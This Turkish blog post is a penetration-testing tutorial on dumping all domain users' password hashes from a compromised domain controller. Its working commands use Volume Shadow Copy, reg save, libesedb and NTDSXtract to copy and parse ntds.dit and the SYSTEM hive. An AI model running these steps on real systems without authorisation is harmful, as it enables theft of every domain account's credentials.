26 Temmuz 2013 Cuma

Post Exploitation: Etki Alanındaki Bütün Kullanıcıların Parola Özetlerinin Elde Edilmesi

Post Exploitation: Etki Alanındaki Bütün Kullanıcıların Parola Özetlerinin Elde Edilmesi


Sızma testi sırasında DC ele geçirildikten sonra gerçekleştirilecek adımlardan birisi etki alanındaki tüm kullanıcıların parolasının elde edilmesi gerekebilir. Bu amaçla, MSF smart_hashdump modülü kullanılabilir. Ancak DC gibi kritik bir makineye MSF ile bağlanmak istenmeyen şeylere sebep olabilir. Bu sebeple, sisteme daha az zarar verme ihtimali olan yöntemler kullanılması gerekebilir.

Bu yazıda DC'ye yetkili kullanıcı hakkı ile erişim elde ettikten sonra, NTDS.dit ve SYSTEM dosyaları elde edilecek ve daha sonra da kullanıcı parolalarının özeti elde edilecektir.

1) NTDS.dit ve SYSTEM Dosyalarının Elde Edilmesi

Etki alanı nesnelerine ait bilgiler temel olarak NTDS.dit dosyasında bulunmaktadır diyebiliriz. Bu dosya da SYSTEM dosyasındaki bir anahtarla (SYSKEY) şifrelenmiştir. Bu 2 dosya elde edilirse, etki alanındaki kullanıcıların parola özetleri elde edilebilir. Ancak bu 2 dosyaya erişim işletim sistemi tarafından engellenmiştir. Bu amaçla, Volume Shadow Copy kullanılabilir.

Shadow kopya oluşturmak için, öncelikle, işletim sisteminin kurulu olduğu ve NTDS.dit dosyasının tutulduğu disk'te "Configure Shadow Copies..." seçimi yapılır.


Sonrasında seçilen alan Shadow kopya oluşturma özelliği aktifleştirilir.


Uyarı mesajı gelirse, bu mesaj onaylanır.


Böylece ilk kopya oluşturulmuştur:


Shadow kopya oluşturma işlemi "Disable" butonu ile iptal edilebilir veya Setting butonu ile konfigüre edilebilir.


Oluşan Shadow kopya içerisinden NTDS.dit ve SYSTEM dosyalarını elde etmek için öncelikle tüm shadow kopyalar listelenir:
vssadmin.exe list shadows


Bu örnekte tek bir kere Shadow kopyası oluşturulduğu için, bir adet Shadow kopya listenmiştir. Bu dizin "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1" olarak belirtilmiştir. En sondaki ID değeri her Shadow için bir artacaktır.

Bu Shadow kopya içerisindeki NTDS.dit ve SYSTEM dosyaları herhangi bir yere (C:\Users\Administrators\Desktop gibi) kaydedilebilir.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\Users\Administrator\Desktop
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\config\SYSTEM C:\Users\Administrator\Desktop


Elde edilen bu dosyalar Kali bir makinenin üzerine alınabilir. Ancak etki alanında çok fazla nesnenin olması bu dosyaların boyutunun artmasına sebep olacaktır. Bu durum da ağ üzerinde anormallik tespiti yapan ürünlerin (ADS gibi) alarm üretmesine sebep verebilir.



Not: DC'nin arayüzüne erişmeden, komut satırını kullanılarak da Shadow kopya elde edilebilir:
vssadmin create shadow /for=c:


Not: SYSTEM dosyası komut satırından ele geçirmek için Shadow kopyası oluşturmaya gerek yoktur. Aşağıdaki komutun çalışması yeterlidir:
reg SAVE HKLM/SYSTEM C:\SYSTEM_Dosyasi


Bu dosyalar Kali bilgisayarın root masaüstüne kaydedilir.

2) Elde Edilen Dosyalardan Etki Alanındaki Kullanıcıların Parola Özetlerinin Elde Edilmesi


Bu başlıkta, kopyalanan NTDS.dit ve SYSTEM dosyaları kullanılarak, etki alanındaki kullanıcı parolaları elde edilecektir. Bu amaçla önce NTDS.dit veritabanından ilgili tablolar çekilecek, daha sonra da bu tablolardan istenen hesap bilgileri çekilecektir. Bu işlem için Google Code üzerindeki "libesedb" aracı kullanılabilir.


Harici linke erişildiğinde araç görülmektedir:


Araç Kali üzerine indirilir.
wget https://255adcba056b7d59fd55a94f0ea02de0cf110bfb.googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz --no-check-certificate



Sıkıştırılmış dosya çıkarılır.
gunzip libesedb-alpha-20120102.tar.gz
tar -xvf libesedb-alpha-20120102.tar


Konfigürasyon işlemi gerçekleştirilir.
ls
cd libesedb-20120102/
ls
ls -la configure
chmod +x configure
ls -la configure
./configure && make


Sonrasında da esedbtools/ klasörüne girilerek /root/Desktop dizinine koyulan ntds.dit dosyasındaki tablolar dışarıya aktarılır.
cd esedbtools/
ls
./esedbexport /root/Desktop/ntds.dit


Dışa aktarım sonrası durum aşağıdaki gibidir:
ls
cd ntds.dit.export/
ls


Daha sonra dışa aktarılan tabloları kullanarak etki alanındaki kullanıcıların parolalarını elde etmek için NTDSXTRACT aracının ana sayfasına girilir.


Aracın 1.0 sürümü indirilir
cd /root/
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
ls
unzip ntdsxtract_v1_0.zip


Amaç, etki alanı kullanıcılarının parola özetini almak olduğu için dsusers.py betiği kullanılacaktır. Bu betik parametre olarak NTDS.dit içerisinden çıkartılmış olan veri tablosunu ve link tablosunu almakta, ayrıca SYSTEM hive dosyasını da kullanmaktadır.
ls
cd NTDSXtract\ 1.0/
ls
python ./dsusers.py /root/libesedb-20120102/esedbtools/ntds.dit.export/datatable.3 /root/libesedb-20120102/esedbtools/ntds.dit.export/link_table.5 --passwordhashes /root/Desktop/SYSTEM


Böylece etki alanındaki kullanıcıların parola özetleri bu şekilde elde edilmiştir.

Hiç yorum yok:

Yorum Gönder